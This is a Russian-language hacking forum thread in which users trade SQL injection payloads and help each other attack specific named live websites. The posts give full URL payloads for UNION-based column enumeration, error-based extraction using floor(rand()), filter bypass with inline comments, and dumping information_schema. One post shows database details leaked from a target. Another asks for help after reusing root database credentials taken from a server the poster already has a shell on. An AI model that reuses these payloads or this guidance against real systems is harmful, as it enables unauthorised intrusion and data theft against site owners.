есть - union+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables+where+table_schema='имя database()' но вывести можго только 1024 символа
В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ... а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи? P.S Error-based тоже юзал..
нет через обычный union вывожу. c⧱uКч"‡Bњn dс\ ґЃJК.я-йј ЛXЫ l[Ж RЂNяїџъ ХzWt9:fЗРЭh.G JyM·B>ґ< с–ЗА эти кракозябры (все по 16 симв) хеши - уверен на 100% но вот какие. Может это 32 символьный md5 просто некоректно выводиться ? Кстати тип поля - text. Помогите разобраться, я в полном тупике. У кого есть какие идеи пишите.
http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+information_schema.tables+group+by(concat(version(),0x00,floor(rand(0)*2))))--+ Code: Duplicate entry '5.0.92-community' for key 1
select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a,0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a) где 666 - кол-во строк не более максимального значения в таблице.
Всем Хай, вот есть сайт http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно
Смотри, там у тебя два запроса. http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true Соответственно, кол-во = 26.
амне показалось фильтрация идет http://www.lingvoinfo.com/?link=115/**/order/**/by/**/26+--+ true http://www.lingvoinfo.com/?link=115/**/order/**/by/**/27+--+ false
Code: http://www.porsche-spb.ru/model.phtml?id=9999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+ porsche_main@localhostorsche_main:5.5.19 Вроде все стандартно...
граждане, вопрос такой, есть шелл, нашол root конфиг бд пароль и логин, коннектился root-ом к базе пару недель назад все гуд, а сейчас пишет Access denied for user 'root'@'localhost' (using password: YES), думал пароль сменили, проверил - нет, таже связка логина и пароля, вопрос - в чем прикол?? p.s. если конекчюсь не рутом, все норм, коннект происходит